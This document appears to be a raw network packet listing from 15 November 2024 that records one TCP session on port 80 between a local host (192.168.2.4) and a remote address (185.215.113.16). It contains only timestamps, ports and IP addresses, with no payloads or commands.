Nov 15, 2024 14:09:35.045849085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.045861959 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.045875072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.045909882 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046081066 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046132088 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046147108 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046158075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046169043 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046180964 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046200991 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046221018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046629906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046643019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046653032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046664000 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046675920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046685934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046699047 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046700001 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046710014 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046722889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046732903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046736002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046744108 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046746016 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046761036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.046777010 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.046804905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.047519922 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047529936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047539949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047549963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047559023 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047569036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047575951 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.047580004 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047591925 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047596931 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.047602892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047610998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047621012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047631025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.047658920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.047658920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.047658920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.047709942 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.048394918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048408031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048417091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048425913 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048435926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048450947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048458099 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.048461914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048472881 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048482895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048482895 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.048494101 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048504114 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.048505068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.048528910 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.048544884 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.049463034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049475908 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049484015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049494028 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049503088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049513102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049521923 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.049523115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049534082 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.049535036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049546957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049556017 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.049556971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049568892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.049570084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.049611092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050174952 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050187111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050199986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050209999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050219059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050225019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050242901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050263882 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050856113 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050868034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050878048 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050889015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050899029 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050908089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050909996 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050920010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050930977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050931931 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050941944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.050951004 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.050981045 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.051517010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.051564932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.093031883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.093080997 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.093096972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.093101025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.093133926 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.093149900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.093262911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.093274117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.093283892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.093314886 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.093341112 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.123428106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123441935 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123454094 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123495102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.123533964 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123547077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123558998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123569012 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.123591900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.123619080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.123784065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123795986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123806953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123817921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.123833895 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.123876095 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.124017000 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.124062061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.124315977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.124335051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.124345064 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.124368906 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.124409914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.124442101 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.124453068 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.124509096 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.162698030 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162750959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162775040 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162775040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.162813902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.162826061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.162842989 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162854910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162867069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162878036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.162910938 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.162955046 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163120031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163166046 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163173914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163178921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163187981 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163211107 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163234949 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163415909 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163430929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163446903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163459063 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163465023 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163475037 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163508892 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163753033 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163856030 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163871050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163880110 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163888931 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163894892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163904905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163918018 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163928032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163928986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163928986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163939953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.163974047 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.163990021 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164278030 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164289951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164309025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164316893 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164324045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164324999 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164333105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164341927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164360046 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164374113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164767981 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164778948 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164788008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164805889 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164815903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164818048 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164828062 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164835930 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164839983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164851904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164858103 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164861917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164871931 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164881945 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164887905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164894104 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.164916992 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.164932966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165504932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165517092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165527105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165538073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165548086 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165555000 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165560007 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165570974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165572882 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165580034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165591002 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165605068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165606022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165618896 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165627003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165632010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165642023 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165648937 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165653944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165664911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.165678024 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165688992 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.165788889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.166363955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166376114 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166384935 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166395903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166407108 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166418076 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.166418076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166425943 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166435957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166441917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166445017 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.166449070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166479111 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.166493893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.166898966 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166908979 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166919947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166929960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166939974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.166948080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167038918 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167118073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167129993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167138100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167149067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167160034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167167902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167185068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167195082 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167475939 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167485952 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167496920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167517900 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167521000 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167530060 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.167555094 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.167570114 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.210305929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.210359097 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.210364103 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.210375071 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.210381031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.210490942 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.240611076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.240690947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.240700960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.240720034 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.240762949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.240775108 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.240791082 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.240818977 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.240902901 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.240959883 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.241064072 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241075039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241080999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241086006 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241092920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241097927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241102934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241158962 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.241533041 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241580963 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.241782904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241792917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.241861105 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.280086994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280153036 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.280164003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280175924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280247927 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.280350924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280356884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280363083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280373096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280404091 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.280488968 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.280718088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280728102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280733109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280738115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280744076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280750036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280754089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.280827999 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.281094074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281111956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281122923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281137943 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.281157017 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.281225920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.281420946 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281433105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281438112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281444073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281450033 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281454086 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281459093 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281464100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281469107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281472921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.281474113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.281584024 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.282280922 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282290936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282295942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282300949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282305956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282310009 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282315016 CET	80	49761	185.215.113.16	192.168.2.4
